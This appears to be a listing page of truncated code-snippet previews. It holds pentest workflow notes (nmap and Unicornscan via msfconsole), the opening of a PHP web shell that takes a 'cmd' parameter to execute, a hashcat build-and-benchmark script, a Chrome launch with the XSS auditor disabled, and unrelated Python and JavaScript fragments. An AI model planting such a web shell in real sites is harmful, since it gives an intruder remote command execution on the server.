- Recon
- Find vuln
- Exploit
- Document it
Unicornscans in cli, nmap in msfconsole to help store loot in database.
| # Must be run in console to work properly | |
| import numpy as np | |
| import cv2 | |
| import time | |
| from scipy import signal | |
| import matplotlib.pyplot as plt | |
| import matplotlib | |
| import threading | |
| import scipy.signal as sig |
| <html> | |
| <body> | |
| <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> | |
| <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> | |
| <input type="SUBMIT" value="Execute"> | |
| </form> | |
| <pre> | |
| <?php | |
| if(isset($_GET['cmd'])) | |
| { |
| class Vector { | |
| constructor(VectorArray) { | |
| //TODO: Check things? | |
| this._values = VectorArray; | |
| } | |
| toArray() { | |
| return this._values; | |
| } | |
| get length() { | |
| return this._values.length; |
| /* | |
| * Globals | |
| * @type {Object} | |
| */ | |
| var G, PSInstaller, PSU, e, errorMessage, psInstaller; | |
| var isWindows = $.os.match(/windows/i); | |
| var isMac = !isWindows; | |
| G = { |
| #!/bin/bash | |
| git clone https://github.com/hashcat/hashcat.git | |
| mkdir -p hashcat/deps | |
| git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL | |
| cd hashcat/ && make | |
| ./hashcat --version | |
| ./hashcat -b -D 1,2 | |
| ./example0.sh |
| '/Applications/Google Chrome.app/Contents/MacOS/Google Chrome' --disable-xss-auditor --enable-devtools-experiments --disable-features=enable-automatic-password-saving |